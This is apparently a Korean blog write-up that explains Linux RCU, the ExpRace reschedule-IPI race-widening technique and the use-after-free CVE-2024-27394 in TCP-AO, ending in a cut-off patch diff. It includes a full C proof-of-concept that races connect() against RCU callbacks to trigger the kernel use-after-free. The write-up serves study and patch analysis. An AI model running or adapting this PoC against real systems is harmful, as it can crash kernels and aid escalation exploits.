Read-Copy-Update (RCU)

이 글에서는 취약점과 관련이 있는 Tree RCU만 설명하며, 이는 다양한 RCU 유형 중 CONFIG_TREE_RCU 설정에 해당한다. 이미 RCU에 대해 알고 있다면 이 부분은 건너뛰어도 된다.
먼저, Read-Copy-Update(RCU)와 관련된 API의 사용에 대해 알아보자.

RCU는 읽기 작업이 많은 환경에서 사용하는 동기화 기법이다. 기존의 락(뮤텍스, 스핀락 등)은 쓰기 작업 중에 읽기 작업을 차단하지만, RCU는 읽기와 쓰기 작업이 동시에 실행될 수 있도록 허용하여 오버헤드*를 최소화한다.

오버헤드 : 어떤 작업을 수행하는 데 추가적으로 발생하는 비용

RCU는 업데이트 프로세스를 제거(Removal), 그레이스 기간(Grace Period), 회수(Reclamation) 라는 세 단계로 나눈다. 먼저, 제거 단계에서 기존 데이터의 포인터를 삭제하여 이후의 읽기 작업이 기존 데이터 구조에 접근할 수 없게 하고, 그다음 모든 읽기 작업이 끝날 때까지 기다린다(그레이스 기간). 이후, 기존 데이터를 파괴하는 회수 단계가 실행된다. RCU는 데이터 구조를 읽기 중인 동안에는 kfree()로 메모리를 해제하지 못하도록 하여 UAF(Use After Free) 취약점이 발생하지 않도록 보장합니다.

여기서 그레이스 기간(Grace Period)은 기존 데이터 구조를 참조했던 모든 읽기 작업이 끝날 때까지 기다리는 시간이다. 이는 서로 다른 CPU에서 동시에 실행 중인 읽기 작업이 충돌하거나 혼란스러운 상태에 빠지는 것을 방지하기 위해 매우 중요하다.

RCU의 주요 API와 예제로 더 자세히 알아보자. 먼저, 읽기 작업 측에서 rcu_read_lock()/rcu_read_unlock()을 호출하여 읽기 작업의 중요 구역을 지정해준다. 중요 구역을 지정해주는 이유는 읽기 작업이 진행 중일 때, 쓰기 작업이 참조 중인 데이터를 변경하지 못하도록 보장하기 위해서 지정해준다. 그리고 RCU로 보호된 포인터를 역참조할 때, 메모리 장벽 역할을 하는 rcu_dereference()와 같은 API를 사용해야 한다(UAF 방지):

int example_reader(void) {
	int val;
    rcu_read_lock();
    val = rcu_dereference(global_ptr)->a;
    rcu_read_unlock;
    return val;
}

rcu_read_lock()은 CONFIG_PREEMPT_RCU가 커널에서 설정되지 않은 경우 preempt_disable()을 호출하여 선점을 금지한다. CONFIG_PREEMPT_RCU가 설정된 경우, rcu_read_lock()은 선점을 금지하지 않고, 대신 current->rcu_read_lock_nesting 값을 1 증가시킨다. 이 취약점을 유발한 커널은 CONFIG_PREEMPT_RCU가 활성화된 상태였다.

CONFIG_PREEMPT_RCU : 커널의 설정 옵션 중 하나로 RCU 메커니즘에서 선점을 허용 여부 결정
current->rcu_read_lock_nesting : 현재 프로세스에서 rcu_read_lock() 호출의 중첩 깊이를 기록하는 필드

다음으로, 업데이트 작업은 RCU로 보호된 데이터 구조를 직접 수정하면 안 된다. 대신, 새로운 데이터 구조를 할당하고 수정한 후, rcu_assign_pointer()를 사용해 기존 데이터 구조를 교체해야 한다. 그리고 이 교체 작업을 수행할 때, 전통적인 락(스핀락이나 뮤텍스 등)을 사용하여 업데이트 측 중요 구역(Update-side Critical Section)을 지정해야 하며, 그렇지 않으면 업데이트 작업 간에 레이스 컨디션이 발생할 수 있습니다:

Update-side Critical Section : 업데이트 작업을 수행하는 코드 영역

void example_reclaim(struct rcu_head *head) {
        struct example *old = container_of(head, struct example, rcu);
 
        kfree(old);
}
 
void example_updater(int a) {
        struct example *new;
        struct example *old;
 
        new = kzalloc(sizeof(*new), GFP_KERNEL);
 
        spin_lock(&global_lock); // Update-side Critical Section 시작
 
        old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
        new->a = a;
        rcu_assign_pointer(global_ptr, new);
 
        spin_unlock(&global_lock); // Update-side Critical Section 종료
 
        call_rcu(&old->rcu, example_reclaim);
}

위 코드에서 call_rcu() 는 모든 읽기 측 중요 구역(Read-side Critical Sections)이 끝나고 그레이스 기간(Grace Period)이 종료되었을 때, 등록된 콜백 함수(example_reclaim)를 호출하는 함수다. 등록된 회수 콜백 함수는 Soft IRQ 컨텍스트에서 호출된다.

Soft IRQ : 리눅스 커널에서 사용되는 인터럽트 처리 메커니즘 중 하나. 하드웨어 인터럽트 처리 이후에 실행되는 소프트웨어 기반의 인터럽트 처리를 의미

이제 위의 예제에서 example_reader()와 example_updater()는 동시에 실행되더라도 레이스 컨디션이 발생하지 않는다. example_reader 함수는 global_ptr에서 원본 객체나 복사본을 가져온다. 만약 원본 객체를 가져온다고 해도, 모든 읽기 측 중요 구역이 끝난 후에만 원본 객체가 kfree()로 해제되기 때문에 안전이 보장된다.

이제 리스트와 관련된 RCU API를 살펴보자. 리스트에 노드를 추가하는 함수는 list_add_rcu(), 리스트를 순회하는 매크로는 list_for_each_entry_rcu, 리스트에서 노드를 삭제하는 함수는 list_del_rcu()다. API 사용 예제:

void example_add(int a) {
        struct example *node;
 
        node = kzalloc(sizeof(*node), GFP_KERNEL);
        node->a = a;
 
        spin_lock(&global_lock);
        list_add_rcu(&node->list, &global_list);
        spin_unlock(&global_lock);
}
 
void exmaple_iterate(void) {
        struct example *node;
 
        rcu_read_lock();
        list_for_each_entry_rcu(node, &global_list, list) {
                pr_info("Value: %d\n", node->a);
        }
        rcu_read_unlock();
}
 
void example_del(void) {
        struct example *node, *tmp;
        
        spin_lock(&global_lock);
 
        list_for_each_entry_safe(node, tmp, &global_list, list) {
                list_del_rcu(&node->list);
                call_rcu(&node->rcu, example_reclaim);
        }
        
        spin_unlock(&global_lock);
}

위 예제의 세 함수는 동시에 실행되더라도 레이스 컨디션이 발생하지 않는다. list_add_rcu()는 쓰기 작업이기 때문에, 스핀락을 사용해 Update-side Critical Section을 설정해줘야 한다. 그리고 list_for_each_entry_rcu는 rcu_read_lock()으로 보호되는 Read-side Critical Section 안에서만 사용해야 한다.

추가로, 해시 연결 리스트도 유사한 API를 제공해준다: hlist_add_rcu(), hlist_for_each_entry_rcu, hlist_del_rcu() 정도 있다. 사용 방법과 주의 사항은 리스트를 위한 API와 동일하다.

ExpRace

리눅스 커널에서 발생하는 레이스 컨디션 취약점은 일반적으로 같은 서브시스템 내의 두 개 이상의 함수 간에서 발생한다. 예를 들어, ioctl()과 write(), 또는 gc와 sendmsg() 간에서 발생하는 경우가 많다. 하지만 CVE-2024-27394는 조금 다르다. 이 취약점에서 레이스 컨디션을 발생시키는 두 프로세스 중 하나는 call_rcu() 함수의 콜백이며, 사용자가 타이밍을 직접 제어할 수 없다. 게다가, 레이스 윈도우도 매우 좁아서 까다롭다.

그래서 이 취약점을 이용하기 위해 USENIX Security ’21에 채택된 ExpRace 논문의 기법을 사용했다.

이 논문은 간접적인 인터럽트 생성 메커니즘을 사용하여 레이스 윈도우를 확보하고 익스플로잇의 신뢰성을 높이는 기법들을 설명한다. 논문에서 소개된 기법 중 하나는 Reschedule Inter Processor Interrupts (Reschedule IPI)를 활용하는 것으로, 이는 특정 프로세서로 작업을 이동시키거나 시스템의 여러 프로세서에 작업을 균등하게 분배하는 데 사용되는 Soft IRQ다. Reschedule IPI는 사용자가 sched_setaffinity 시스템 호출을 통해 생성할 수 있다.

Reshcedule IPI : CPU 간 작업을 재배치하거나 스케줄링을 조정할 때 발생하는 인터럽트

이제 이 기술을 사용하는 방법을 간단히 알아보자. 먼저, 다음은 예제 커널 모듈이다. 이 예제에서 example_open()은 open()을 통해 호출된다.

static int example_open(struct inode *inode, struct file *file);
 
struct file_operations example_fops = {
        .open       = example_open,
};
 
static struct miscdevice example_driver = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "example",
        .fops = &example_fops,
};
 
static int example_open(struct inode *inode, struct file *file) {
        printk(KERN_INFO "Step 1");
        printk(KERN_INFO "Step 2");
        printk(KERN_INFO "Step 3");
        printk(KERN_INFO "Step 4");
 
        return 0;
}
 
static int example_init(void) {
        int result;
 
        result = misc_register(&example_driver);
        if (result) {
                printk(KERN_INFO "misc_register(): Misc device register failed");
                return result;
        }
 
        return 0;
}
 
static void example_exit(void) {
        misc_deregister(&example_driver);
}
 
module_init(example_init);
module_exit(example_exit);

example_open()의 printk("Step 2")와 printk("Step 3") 사이의 딜레이를 주고 싶으면 어떻게 해야 할까? sched_setaffinity 시스템 호출을 호출하면 된다. (다음 코드는 ExpRace 논문의 기본 코드를 기반으로 작성함):

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;
        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);
 
        // if pid is NULL then calling thread is used
        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                err(1, "affinity");
}
 
void target_thread(void *arg)
{
        int fd;
 
        // Suppose that a victim thread is running on core 2.
        pin_this_task_to(2);
        while (1) {
                fd = open("/dev/example", O_RDWR);
        }
}
 
int main()
{
        pthread_t thr;
 
        pthread_create(&thr, NULL, target_thread, NULL);
 
        // Send rescheduling IPI to core 2 to extend the race window.
        pin_this_task_to(2);
        ...

target_thread라는 스레드를 생성 후 pin_this_task_to(2)를 호출해 스레드를 CPU #2에 고정하고, 예제 모듈에서 open()을 반복적으로 호출하게 한다. 이로 인해 example_open() 함수는 CPU #2에서 무한 실행된다.
부모 스레드에서 pin_this_task_to(2)를 호출한다. 이때, target_thread 스레드에서 printk("Step 2")가 반환된 직후 CPU #2에서 부모 스레드가 보낸 Reschedule IPI가 수신되면, 인터럽트가 부모 스레드를 CPU #2로 이동시킨다. 따라서 target_thread 스레드는 printk("Step 2")와 printk("Step 3") 사이에서 멈추게 된다.
Reschedule IPI 처리 이후 target_thread 스레드로 돌아오면 남은 printk("Step 3")와 printk("Step 4")가 실행된다.

이 코드를 실행한 후 커널 로그를 확인하면, 나는 왜인지 Step 4 부터 출력이 되었는데, Step 4 와 Step 1 사이의 실행 시간이 매우 크게 딜레이 되는 것을 볼 수 있다. 이는 Step 4 직후 사용자가 보낸 Reschedule IPI에 의해 강제로 선점되었기 때문이다.

example_module.c

#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
 
 
static int example_open(struct inode *inode, struct file *file);
 
struct file_operations example_fops = {
        .open       = example_open,
};
 
static struct miscdevice example_driver = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "example",
        .fops = &example_fops,
};
 
static int example_open(struct inode *inode, struct file *file) {
        printk(KERN_INFO "Step 1");
        printk(KERN_INFO "Step 2");
        printk(KERN_INFO "Step 3");
        printk(KERN_INFO "Step 4");
 
        return 0;
}
 
static int example_init(void) {
        int result;
 
        result = misc_register(&example_driver);
        if (result) {
                printk(KERN_INFO "misc_register(): Misc device register failed");
                return result;
        }
 
        return 0;
}
 
static void example_exit(void) {
        misc_deregister(&example_driver);
}
 
module_init(example_init);
module_exit(example_exit);
 
MODULE_LICENSE("GPL");
MODULE_AUTHOR("d0razi");
MODULE_DESCRIPTION("Example Kernel Module for Reschedule IPI Test");

test.c

 
#define _GNU_SOURCE
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
 
void pin_this_task_to(int cpu)
{
    cpu_set_t cset;
    CPU_ZERO(&cset);
    CPU_SET(cpu, &cset);
 
    if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
        err(1, "affinity");
}
 
void* target_thread(void *arg)
{
    int fd, cnt=0;
 
    while(cnt < 10) {
        pin_this_task_to(2);
        fd = open("/dev/example", O_RDWR);
        cnt++;
    }
    return NULL;
}
 
int main() {
    pthread_t thr;
 
    pthread_create(&thr, NULL, target_thread, NULL);
 
    pin_this_task_to(2);
 
    pthread_join(thr, NULL);
 
    return 0;
}

Makefile

obj-m += example_module.o
 
ccflags-y := -Wno-error
 
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

즉, 이 기술을 사용함해서 RCU Grace Period보다 더 긴 시간 간격을 만들어 특정 시점에 태스크를 선점 할 수 있다.

물론, 사용자는 선점 타이밍을 제어할 수 없으므로, 원하는 지점에서 선점이 이루어질 때까지 태스크를 반복해야 한다.

CVE-2024–27394: TCP Authentication Option Use-After-Free 취약점

TCP Authentication Option은 TCP 연결의 보안을 강화하기 위해 설계된 네트워크 프로토콜 옵션이다. 이 옵션은 기존의 TCP MD5 서명 옵션을 대체하고, TCP 연결을 통해 데이터의 무결성과 인증을 검증하는 역할을 한다.

CVE-2024-27394는 net/ipv4/tcp_ao.c 파일의 tcp_ao_connect_init() 함수에서 발생한다. 이 함수는 사용자가 IPv4 기반 TCP 소켓을 대상으로 connect() 함수를 호출할 때 실행되며, 호출 스택은 다음과 같다:

connect()
  => __sys_connect()
    => __sys_connect_file()
      => inet_stream_connect()
        => __inet_stream_connect()
          => tcp_v4_connect()
            => tcp_connect()
              => tcp_connect_init()
                => tcp_ao_connect_init()

따라서, 이 함수는 피어 연결의 성공 여부와 관계없이 연결 준비 과정에서 호출된다.

피어(Peer) : 동등한 위치에서 통신하는 두 개의 장치

tcp_ao_connect_init() 함수는 TCP-AO 연결에서 유효하지 않은 키를 제거하여 관리하기 위해 hlist_for_each_entry_rcu를 사용하여 엔트리를 반복하며, 특정 조건을 만족하지 않는 키를 해제한다. call_rcu()의 사용은 안전해 보이지만, tcp_ao_connect_init() 함수가 RCU Read-side Critical Section 내에 있지 않기 때문에 문제가 발생한다.

void tcp_ao_connect_init(struct sock *sk)
{
	struct tcp_sock *tp = tcp_sk(sk);
	struct tcp_ao_info *ao_info;
	union tcp_ao_addr *addr;
	struct tcp_ao_key *key;
	int family, l3index;
 
	ao_info = rcu_dereference_protected(tp->ao_info,
										lockdep_sock_is_held(sk));
	if (!ao_info)
		return;
 
	/* 피어와 일치하지 않는 모든 키 제거 */
	family = sk->sk_family;
	if (family == AF_INET)
		addr = (union tcp_ao_addr *)&sk->sk_daddr;
#if IS_ENABLED(CONFIG_IPV6)
	else if (family == AF_INET6)
	addr = (union tcp_ao_addr *)&sk->sk_v6_daddr;
#endif
	else
		return;
	l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
											sk->sk_bound_dev_if);
 
	hlist_for_each_entry_rcu(key, &ao_info->head, node) {    // <==[2]
		if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
			continue;
 
		if (key == ao_info->current_key)
			ao_info->current_key = NULL;
		if (key == ao_info->rnext_key)
			ao_info->rnext_key = NULL;
		hlist_del_rcu(&key->node);
		atomic_sub(tcp_ao_sizeof_key(key), &sk->sk_omem_alloc);
		call_rcu(&key->rcu, tcp_ao_key_free_rcu);  
        // <==[1]
		}
}

만약 call_rcu() 호출 후 RCU Grace Period가 완료되고 [1], tcp_ao_key_free_rcu()가 호출되어 키가 해제된다면, 엔트리를 계속 반복하기 때문에 해제된 키에 또 접근해서 Use-After-Free 취약점이 발생할 수 있다.

ao_info와 key [2] 는 유저 영역에서 setsockopt() 함수 호출 시 인자로 TCP_AO_ADD_KEY 명령을 전달하여 할당될 수 있다:

int tcp_parse_ao(struct sock *sk, int cmd, unsigned short int family,
                 sockptr_t optval, int optlen)
{
        if (WARN_ON_ONCE(family != AF_INET && family != AF_INET6))
                return -EAFNOSUPPORT;
 
        switch (cmd) {
        case TCP_AO_ADD_KEY:
                return tcp_ao_add_cmd(sk, family, optval, optlen);    // <==[3]
        case TCP_AO_DEL_KEY:
                return tcp_ao_del_cmd(sk, family, optval, optlen);
        case TCP_AO_INFO:
                return tcp_ao_info_cmd(sk, family, optval, optlen);
        default:
                WARN_ON_ONCE(1);
                return -EINVAL;
        }
}

setsockopt() 함수가 TCP_AO_ADD_KEY 명령과 함께 호출되면 tcp_ao_add_cmd()가 호출되어 실행된다 [3].

이 명령이 TCP 소켓에서 처음으로 사용될 경우, ao_info가 할당되고 tcp_sk(sk)->ao_info에 저장된다 [4].

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{       
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);
 
        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {
        
        ...
        
        if (first) {
                if (!static_branch_inc(&tcp_ao_needed.key)) {
                        ret = -EUSERS;
                        goto err_free_sock;
                }
                sk_gso_disable(sk);
                rcu_assign_pointer(tcp_sk(sk)->ao_info, ao_info);    // <==[4]
        }

이는 TCP 소켓마다 ao_info가 각자 사용되는 것을 의미한다. 이후key가 할당되고 ao_info와 연결된다 [5]:

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{                
        ...
        key = tcp_ao_key_alloc(sk, &cmd);
        if (IS_ERR(key)) {
                ret = PTR_ERR(key);
                goto err_free_ao;
        }
 
        INIT_HLIST_NODE(&key->node);
        memcpy(&key->addr, addr, (family == AF_INET) ? sizeof(struct in_addr) :
                                                       sizeof(struct in6_addr));
        key->prefixlen  = cmd.prefix;
        key->family     = family;
        key->keyflags   = cmd.keyflags;
        key->sndid      = cmd.sndid;
        key->rcvid      = cmd.rcvid;
        key->l3index    = l3index;
        atomic64_set(&key->pkt_good, 0);
        atomic64_set(&key->pkt_bad, 0);
 
        ret = tcp_ao_parse_crypto(&cmd, key);
        if (ret < 0)
                goto err_free_sock;
 
        if (!((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE))) {
                tcp_ao_cache_traffic_keys(sk, ao_info, key);
                if (first) {
                        ao_info->current_key = key;
                        ao_info->rnext_key = key;
                }
        }
 
        tcp_ao_link_mkt(ao_info, key);    // <==[5]

tcp_ao_link_mkt( ) : TCP-AO에서 새로 생성된 키를 해당 소켓의 인증 키 목록에 추가하는 기능

tcp_ao_add_cmd() 함수에서는 새로운 키가 할당되고 초기화된다. 이 키는 sndid와 rcvid 같은 사용자 지정 값뿐만 아니라 보안 키 문자열도 포함하며, 이후 ao_info->head에 연결된다.

sndid : 송신 키
rcvid : 수신 키

이렇게 하면 tcp_ao_connect_init() 함수에서 취약한 hlist_for_each_entry_rcu에 도달할 수 있는 준비가 완료된다. 취약점을 트리거하려면 바로 call_rcu()를 호출해야 한다. 그런 다음 RCU Grace Period가 종료되어야 하며, 그러면 tcp_ao_key_free_rcu() 콜백이 트리거되고 키가 해제된다.

하지만 call_rcu() 이후 RCU Grace Period가 자연스럽게 즉시 종료되는 상황은 매우 드물다. 따라서 이 취약점을 안정적으로 트리거 하려면 Reschedule IPI 기법을 사용해야 한다. 취약점 트리거 시나리오는 다음과 같다:

               cpu0                                        cpu1
     
     setsockopt(A, TCP_AO_ADD_KEY)
       key = tcp_ao_key_alloc()    // key alloc
     
     sched_setaffinity(0)
     connect(A)
       tcp_ao_connect_init(A)
         hlist_for_each_entry_rcu {
         call_rcu(key)
                                                   sched_setaffinity(0)
                                                   [ Send Reschedule IPI to cpu0 ]
     [ connect(A) is preempted ]
     connect(B)
       ...
       
     [ End of RCU Grace Period ]
     __do_softirq(A)
       rcu_core(A)
         tcp_ao_key_free_rcu(A)
           kfree(key)    // key freed
       
     [ Returning to connect(A) ]
         hlist_for_each_entry_rcu {
           key->next    // UAF

setsockopt(TCP_AO_ADD_KEY)가 호출되어 TCP 소켓에 대한 ao_info와 key를 할당하고 최소 두 개의 키가 할당된다.
그런 다음 프로세스가 CPU #0에 고정하고 connect()를 호출해서 call_rcu()가 실행되는 tcp_ao_connect_init()를 호출한다.
그 후 다른 프로세스가 sched_setaffinity(0)를 호출하여 CPU #0으로 Reschedule IPI를 보내면 call_rcu()가 반환된 직후 tcp_ao_connect_init()를 실행하는 프로세스가 선점된다.
RCU Grace Period가 끝나면 call_rcu()에 의해 등록된 tcp_ao_key_free_rcu() 콜백이 트리거되고, 그 다음 키가 kfree() 된다.
선점된 프로세스가 재개되어 tcp_ao_connect_init()으로 돌아오면 hlist_for_each_entry_rcu를 통해 이미 kfree()-d 키에 액세스하여 UAF 취약점을 유발하게 된다.

hlist_for_each_entry_rcu를 반복하는 동안 tcp_ao_connect_init()을 올바르게 선점할 가능성을 높이려면 설정 단계에서 여러 키를 연결해줘야 한다. 그러나 고유한 sndid 및 rcvid 요구 사항으로 인해 연결할 수 있는 키 수에 제한이 있다. 이 필드는 u8 유형이므로 하나의 ao_info에 256개의 고유 키만 연결할 수 있습니다.

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);
 
        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {    // <==[6]
                /* Check that neither RecvID nor SendID match any
                 * existing key for the peer, RFC5925 3.1:
                 * > The IDs of MKTs MUST NOT overlap where their
                 * > TCP connection identifiers overlap.
                 */
                if (__tcp_ao_do_lookup(sk, l3index, addr, family, cmd.prefix, -1, cmd.rcvid))
                        return -EEXIST;
                if (__tcp_ao_do_lookup(sk, l3index, addr, family,
                                       cmd.prefix, cmd.sndid, -1))
                        return -EEXIST;
        }

tcp_ao_add_cmd() 함수에서 ao_info가 이미 할당된 경우, 기존 키의 sndid와 rcvid를 확인**[6]** 한다. 키 할당 요청 시 사용자가 제공한 sndid 또는 rcvid 값이 기존 값과 겹치면 할당이 취소된다. 따라서 연결할 수 있는 키의 수는 u8 유형인 sndid 및 rcvid 멤버의 최대 값으로 제한되므로 0~255 범위까지만 가능하다. 즉, 하나의 ao_info에 256개의 키만 연결할 수 있습니다:

struct tcp_ao_key {
        ...
        u8                      sndid;
        u8                      rcvid;
        ...
};

다음은 Proof-of_Concept 코드입니다:

#define _GNU_SOURCE
 
#include <sys/socket.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <string.h>
#include <time.h>
#include <errno.h>
#include <inttypes.h>
#include <ctype.h>
#include <sys/types.h>
#include <math.h>
#include <time.h>
#include <poll.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <linux/in.h>
#include <linux/socket.h>
#include <signal.h>
#include <pthread.h>
 
#define PORT 8080
#define TCP_AO_ADD_KEY 38
#define TCP_AO_MAXKEYLEN 80
 
#define DEFAULT_TEST_PASSWORD "In this hour, I do not believe that any darkness will endure."
#define DEFAULT_TEST_ALGO "cmac(aes128)"
#define TCP_AO_KEYF_IFINDEX(1 << 0)
 
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
 
struct tcp_ao_add {
    /* setsockopt(TCP_AO_ADD_KEY) */
    struct __kernel_sockaddr_storage addr; /* peer's address for the key */
    char alg_name[64]; /* crypto hash algorithm to use */
    __s32 ifindex; /* L3 dev index for VRF */
    __u32 set_current: 1, /* set key as Current_key at once */
        set_rnext: 1, /* request it from peer with RNext_key */
        reserved: 30; /* must be 0 */
    __u16 reserved2; /* padding, must be 0 */
    __u8 prefix; /* peer's address prefix */
    __u8 sndid; /* SendID for outgoing segments */
    __u8 rcvid; /* RecvID to match for incoming seg */
    __u8 maclen; /* length of authentication code (hash) */
    __u8 keyflags; /* see TCP_AO_KEYF_ */
    __u8 keylen; /* length of ::key */
    __u8 key[TCP_AO_MAXKEYLEN];
}
__attribute__((aligned(8)));
 
struct sockaddr_in serv_addr;
 
void pin_this_task_to(int cpu) {
    cpu_set_t cset;
    CPU_ZERO( & cset);
    CPU_SET(cpu, & cset);
 
    if (sched_setaffinity(0, sizeof(cpu_set_t), & cset))
        perror("affinity");
}
 
int random_val(int a, int b) {
    int random_value;
 
    srand(time(NULL));
 
    random_value = rand() % (b - a + 1) + a;
 
    return random_value;
}
 
void ao_add_key(int sock, __u8 prefix, __u8 sndid, __u8 rcvid, __u32 saddr) {
    struct tcp_ao_add * ao;
    struct sockaddr_in addr = {};
 
    ao = (struct tcp_ao_add * ) malloc(sizeof( * ao));
    memset(ao, 0, sizeof( * ao));
 
    ao -> set_current = !!0;
    ao -> set_rnext = !!0;
    ao -> prefix = prefix;
    ao -> sndid = sndid;
    ao -> rcvid = rcvid;
    ao -> maclen = 0;
    ao -> keyflags = 0;
    ao -> keylen = 16;
    ao -> ifindex = 0;
 
    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = saddr;
 
    strncpy(ao -> alg_name, DEFAULT_TEST_ALGO, 64);
 
    memcpy( & ao -> addr, & addr, sizeof(struct sockaddr_in));
 
    memcpy(ao -> key, "1234567890123456", 16);
 
    if (setsockopt(sock, IPPROTO_TCP, TCP_AO_ADD_KEY, ao, sizeof( * ao)) < 0) {
        perror("setsockopt TCP_AO_ADD_KEY failed");
        close(sock);
        exit(EXIT_FAILURE);
    }
 
    free(ao);
}
 
void add_key(int sock) {
    ao_add_key(sock, 0, 0, 0, 0);
 
    for (int i = 1; i < KEY_COUNT; i++) {
        ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
    }
}
 
void ao_connect(int socks[]) {
    pid_t pid;
 
    for (int i = 0; i < SOCK_COUNT; i++) {
        pid = fork();
        if (pid == 0) {
            pin_this_task_to(0);
 
            if (connect(socks[i], (struct sockaddr * ) & serv_addr, sizeof(serv_addr)) < 0) {
                printf("\nConnection Failed \n");
                exit(EXIT_FAILURE);
            }
        } else {
            usleep(random_val(50000, 100000));
            kill(pid, SIGKILL);
            wait(NULL);
        }
    }
}
 
int main() {
    pid_t pid;
 
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(PORT);
    if (inet_pton(AF_INET, "127.0.0.1", & serv_addr.sin_addr) <= 0) {
        printf("\nInvalid address/ Address not supported \n");
        exit(EXIT_FAILURE);
    }
 
    while (1) {
        pid = fork();
        if (pid == 0) {
            int socks[LOOP_COUNT][SOCK_COUNT];
            pthread_t thr[LOOP_COUNT];
 
            for (int i = 0; i < LOOP_COUNT; i++) {
                for (int j = 0; j < SOCK_COUNT; j++) {
                    if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                        printf("\n Socket creation error \n");
                        exit(EXIT_FAILURE);
                    }
                    add_key(socks[i][j]);
                }
            }
 
            for (int i = 0; i < LOOP_COUNT; i++)
                pthread_create( & thr[i], NULL, ao_connect, socks[i]);
 
            sleep(15);
            exit(0);
        } else {
            int status;
 
            waitpid(pid, & status, 0);
            sleep(0.1);
        }
    }
 
    return 0;
}

PoC 코드를 부분별로 살펴보자. 먼저 1000개의 TCP 소켓을 생성한 다음 add_key()를 호출하여 각 소켓에 ao_info를 할당하고 256개의 키를 연결한다. 이렇게 하면 나중에 선점하는 동안 불필요한 할당 작업을 피할 수 있다.

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
 
void add_key(int sock) {
    ao_add_key(sock, 0, 0, 0, 0);
 
    for (int i = 1; i < KEY_COUNT; i++) {
        ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
    }
}
 
int main() {
        ...
        while (1) {
            pid = fork();
            if (pid == 0) {
                int socks[LOOP_COUNT][SOCK_COUNT];
                pthread_t thr[LOOP_COUNT];
 
                for (int i = 0; i < LOOP_COUNT; i++) {
                    for (int j = 0; j < SOCK_COUNT; j++) {
                        if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                            printf("\n Socket creation error \n");
                            exit(EXIT_FAILURE);
                        }
                        add_key(socks[i][j]);
                    }
                }

다음으로 5개의 ao_connect 스레드가 생성되고 실행된다. 각 ao_connect 스레드는 먼저 pin_this_task_to(0)를 호출하여 후속 작업을 CPU #0에 고정해준다. 그런 다음, 이전 준비 단계에서 키가 연결된 TCP 소켓에서 connect()를 호출하여 tcp_ao_connect_init()을 트리거한다. 1000개의 소켓을 5개의 스레드로 나눈 이유는 5개의 ao_connect 스레드가 pin_this_task_to(0)를 호출할 때 hlist_for_each_entry_rcu의 트래버스 내에서 지속적으로 Reschedule IPI를 전송하고 서로 선점할 수 있도록 하기 위해서다.

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
 
void pin_this_task_to(int cpu) {
    cpu_set_t cset;
    CPU_ZERO( & cset);
    CPU_SET(cpu, & cset);
 
    if (sched_setaffinity(0, sizeof(cpu_set_t), & cset))
        perror("affinity");
}
 
void ao_connect(int socks[]) {
    pid_t pid;
 
    for (int i = 0; i < SOCK_COUNT; i++) {
        pid = fork();
        if (pid == 0) {
            pin_this_task_to(0);
 
            if (connect(socks[i], (struct sockaddr * ) & serv_addr, sizeof(serv_addr)) < 0) {
                printf("\nConnection Failed \n");
                exit(EXIT_FAILURE);
            }
        } else {
            usleep(random_val(50000, 100000));
            kill(pid, SIGKILL);
            wait(NULL);
        }
    }
}
 
int main() {
        ...
        for (int i = 0; i < LOOP_COUNT; i++)
            pthread_create( & thr[i], NULL, ao_connect, socks[i]);

PoC를 실행해보고 싶어서 어떻게든 트러블 슈팅을 해보며 컴파일을 시도해봤지만 아직 부족한 실력으로 인해 실행은 실패했다..

결국 이 CVE-2024-27394는 RCU-Read-side Critical Section 여부에 상관없이 UAF를 방지하기 위해 hlist_for_each_entry_rcu → hlist_for_each_entry_safe로 변경하는 패치를 했다.

diff --git a/net/ipv4/tcp_ao.c b/net/ipv4/tcp_ao.c
index 3afeeb68e8a7..781b67a52571 100644
--- a/net/ipv4/tcp_ao.c
+++ b/net/ipv4/tcp_ao.c
@@ -1068,6 +1068,7 @@ void tcp_ao_connect_init(struct sock *sk)
 {
  struct tcp_sock *tp = tcp_sk(sk);
  struct tcp_ao_info *ao_info;
+ struct hlist_node *next;
  union tcp_ao_addr *addr;
  struct tcp_ao_key *key;
